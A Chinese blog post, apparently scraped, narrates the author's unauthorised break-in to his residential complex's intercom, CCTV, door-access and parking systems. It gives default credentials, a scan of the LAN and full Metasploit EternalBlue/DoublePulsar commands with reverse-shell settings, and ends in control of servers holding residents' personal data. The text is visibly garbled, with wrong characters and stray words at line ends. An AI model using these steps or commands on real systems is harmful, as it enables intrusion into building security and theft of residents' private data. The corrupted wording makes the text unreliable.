前言
博主从小就是一个喜欢把事情简单化的男人,可是现实老是在不经意间给你太多的惊喜,好比不停的搬家。php
博主从大学毕业到如今前先后后凑足了10次搬家运动,终于在第10次搬家的时候搬进了真正属于本身的房子。html
15年末趁着房价最低的时候捡了个漏,一咬牙买下一套两房半小居室,17年交房装修,终于在18年初计划搬进去住,博主我终于不再用搬家了,心情愉悦,住进去以后就开始忙乎各类杂事,因此这几个月是很是的繁忙,博客也更得少,不过内容都在笔记里面,慢慢更。python
博主所购的小区对本身的智能化系统宣传的很到位,因此闲下来的时候博主我就对小区的安防系统进行一次简单的渗透,轻松拿下各类安防系统,这篇文章就来详细的说明一下。ios
准备
开始以前,博主须要对环境进行一个简单的描述,以便你们可以在脑海中脑补一下整个渗透测试的过程,算是博主在线下渗透的一个例子吧,日后还有对整个商场各类店铺各类的渗透过程,都会一一讲解。git
好了,废话就很少说了,我们既然是对网络系统进行渗透测试,天然是得有一个入口,那这个入口在哪找呢?github
你们都知道,通常小区这种内部的网络都是不直接链接到外网的,若是连那也是作了隔离,单独有一个跳板来作转发,这样相对比较安全,可是正常状况都是没外网的,这种局域网系统有两个突出的特色。web
第一点就是维护人员过度的信任了内网的机器,认为只要不链接外网就基本上没事,高枕无忧,真是图样图森破。sql
第二点就是没有安全防御软件,就算有,那也是病毒特征库千百年不会更新,跟摆设同样,没有外网更新个毛线,这一点后面有机器能够验证。shell
因此具有这两个特色的内部局域网是很是脆弱的,只要找到一个入口,基本上整个网络就game over了,这个入口就很是的好找了。数据库
众所周知,如今的小区都是家家户户安装了一个可视对讲机,这玩意有时候挺好用,好比有客人来了,楼下大门门禁能够用这玩意远程开门,能够语音对讲,能够看到对方的脸,还能够录音录像,不只如此,还能跟家里的烟雾报警器连起来,发生火灾直接通知物业并发出警报,还能够呼叫其余住户来一个免费的局域网语音聊天,功能能够说是至关丰富了。
你猜的没错,我们整个渗透测试过程就从这个设备开始,先来看看我们这个厉害的可视对讲机长什么样
经过缺省弱口令进入工程模式,拿到ip地址,网关还有服务器地址
拆下对讲机
我擦嘞,这网线也过短了吧,上工具
把网线进行延长方便接交换机、路由器、笔记本之类的设备,最后确认下通信是否正确
基本准备工做搞定以后就开始进行入侵渗透了。
扫描
根据以前撸光猫内网的经验,这里的IP地址确定是固定的,并且跟住户号是绑定的,若是使用本身的iP地址进行测试,万一出啥问题那不是很是的尴尬,既然如今不少业主都尚未入住,那么IP地址池也有不少的空闲,就使用其余住户的IP地址吧,只要不冲突就行,说干就干,上装备:
一个充电宝、一个路由器、一台笔记本
通电后设置路由器的固定IP
这样笔记本经过无线wifi就能够对IP段进行扫描了,我这使用的扫描软件是Angry IP Scanner,图形界面用起来很爽,并且速度也快
对192.165.0.1/16进行扫描发现存活主机1256个,为了对IP地址快速分类,将存活的IP地址所有导出,编写python脚本对ip的http响应头进行分类,
最终分为下面的这几类:
第一类
mini_httpd/1.19 19dec2003
这一类机器是全部的门禁机,包含了住户家里的对讲机,楼栋大堂的门禁机,车库电梯的门禁机,小区大门的门禁机,经过ip地址以及admin / 123456弱口令能够远程控制,同时telnet也能够链接,管理页面功能很全,包括修改密码,控制开门时间,控制门禁机密码,呼叫住户,呼叫物业中心,恢复出厂设置等等,功能丰富,界面以下
第二类
DNVRS-Webs Hikvision-webs/ App-webs/
这三种都是海康威视的监控探头,登陆界面有如下几种
只有中间那种能够无限次输错密码进行爆破,其余两种都是输错五次就锁定
第三类
Net Keybord-Webs
这是一个网络键盘,一般用于操做监控的云台转动,好比球机的操做杆,登陆界面
密码输错6次就锁定。
第四类
Boa/0.94.13
这个就有意思了,这是车牌识别系统,车辆入库的时候进行车牌识别,拍照存储的机器,也是所有admin admin弱口令直接登陆,里面存储了些啥就很少说了,放两张图你们随意感觉下
经过对这几种设备的归类扫描,最终肯定了几台windows服务器
192.165.15.174 192.165.15.177 192.165.15.190 192.165.15.200 192.165.30.2
使用Nmap扫描结果以下
# Nmap 7.70 scan initiated Fri May 18 23:51:30 2018 as: nmap -iL something_ip.txt -oN scaned.txt -T4 --open Nmap scan report for 192.165.15.174 Host is up (0.063s latency). Not shown: 990 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1433/tcp open ms-sql-s 2383/tcp open ms-olap4 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown Nmap scan report for 192.165.15.190 Host is up (0.046s latency). Not shown: 992 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown Nmap scan report for 192.165.15.200 Host is up (0.030s latency). Not shown: 991 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown Nmap scan report for 192.165.30.2 Host is up (0.064s latency). Not shown: 990 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown # Nmap done at Fri May 18 23:51:46 2018 -- 5 IP addresses (4 hosts up) scanned in 16.25 seconds
很明显,四台机器都开了445端口,其中 192.165.15.174 开了1433端口,明显是sql server数据库,192.165.30.2还开了3389,这台机器是在门禁机里面见过,是门禁系统的服务器。
下面就重点对这几台机器入手,使用msf扫描下看是否是都存在smb漏洞(ms17_010),这漏洞在局域网真的超级好用,扫描截图
发现只有192.165.15.174 不存在ms17_010,其余三台都存在,操做系统分别是
192.165.15.190 win7 sp1 x86
192.165.15.200 win7 sp1 x64
192.165.30.2 win7 sp1 x86
如今目标就很是明确了,可是有个问题,msf自带的利用模块只针对x64版本的操做系统,对于x86版本的系统只能使用其余工具,emmmmm....
一阵思考以后,博主决定先搞定那台64位win7,为了可以正常的反弹shell回来,我把路由器改为桥接模式,本机电脑设置固定IP,这样个人机器就跟目标机器处于相同网络拓扑,反弹天然无压力
so...
msf的用法我这里就很少说了,若是真不知道,能够留言...给出一张run vnc的截图,拿下监控系统
有趣的是这台机器上竟然安装了360安全卫士...
注意看上面一张图的那个监控室,管理员面前有三台机器,因此另外两台我下一步就要搞定。
上面说64位win7已经拿下,如今搞定32位机器,使用 https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit 这里的Ruby脚本便可,须要注意的是若是本机是kali 64位的须要安装 wine32,安装方法是
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
并且全程操做须要在root下面,安装完wine32后执行一下 wine32 cmd.exe 这样会自动在/root下面建立.wine目录,这个目录msf会用到
使用
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
将脚本克隆到本地,而后把目录下的deps 目录和rb文件复制到msf的modules路径下,这样既可使用了(PS:我这里只复制了rb脚本,deps没有复制过去因此命令不太同样),具体命令以下
msf > use exploit/windows/smb/eternalblue_doublepulsar msf exploit(windows/smb/eternalblue_doublepulsar) > set ETERNALBLUEPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/ ETERNALBLUEPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/ msf exploit(windows/smb/eternalblue_doublepulsar) > set DOUBLEPULSARPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/ DOUBLEPULSARPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/ msf exploit(windows/smb/eternalblue_doublepulsar) > set TARGETARCHITECTURE x86 TARGETARCHITECTURE => x86 msf exploit(windows/smb/eternalblue_doublepulsar) > set PROCESSINJECT wlms.exe PROCESSINJECT => wlms.exe msf exploit(windows/smb/eternalblue_doublepulsar) > show targets Exploit targets: Id Name -- ---- 0 Windows XP (all services pack) (x86) (x64) 1 Windows Server 2003 SP0 (x86) 2 Windows Server 2003 SP1/SP2 (x86) 3 Windows Server 2003 (x64) 4 Windows Vista (x86) 5 Windows Vista (x64) 6 Windows Server 2008 (x86) 7 Windows Server 2008 R2 (x86) (x64) 8 Windows 7 (all services pack) (x86) (x64) msf exploit(windows/smb/eternalblue_doublepulsar) > set target 8 target => 8 msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost set rhost msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.165.15.190 rhost => 192.165.15.190 msf exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.165.7.11 lhost => 192.165.7.11 msf exploit(windows/smb/eternalblue_doublepulsar) > exploit
不出意外的话攻击就成功了,给出攻击成功的截图。
第一个是门禁系统,没装杀毒软件,就只有一些门禁卡管理软件
第二个系统是车辆管理系统,车辆出入库时候用的
总结
好了,至此,博主对小区的安防系统进行了简单的渗透测试,成功拿下关键系统,其中在服务器中还发现了大量的敏感文件,包括业主的我的信息,车辆信息,车辆出入登记信息等等,难怪说各类骚扰电话,这简直要分分钟泄露。
后记
安全是一个总体,千里之堤溃于蚁穴,下一次把门禁卡的复制破解还有自动控制升降杠的综合在一块儿再写一篇。
原文连接(https://www.92ez.com/?action=show&id=23469)